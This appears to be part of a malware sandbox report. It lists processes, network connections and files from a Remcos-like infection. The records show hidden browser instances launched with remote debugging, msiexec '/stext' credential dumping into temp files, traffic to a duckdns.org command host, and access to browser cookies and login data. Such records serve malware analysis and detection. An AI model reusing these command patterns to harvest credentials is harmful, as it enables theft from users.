"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1788,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1784 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2304 /prefetch:8

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\chkhknudvoswssthjrngsvoistntkipd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\chkhknudvoswssthjrngsvoistntkipd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mjpz"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:1

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\pdukeyy"

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4620,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,4321345741949084012,4747446144336787080,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa303246f8,0x7ffa30324708,0x7ffa30324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2160,1540947969830339750,11294815192115972335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 245.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
GB 172.217.16.234:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 172.217.16.234:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xql4hzur.we4.ps1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\Finansieringsreglen.Obj

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

\??\pipe\crashpad_2208_DKXEALJUARHXRMFW

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

C:\Users\Admin\AppData\Local\Temp\chkhknudvoswssthjrngsvoistntkipd

C:\ProgramData\remcos\logs.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History-journal

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\d82c04e3-ab83-4e08-862e-dde18c59f356.tmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk
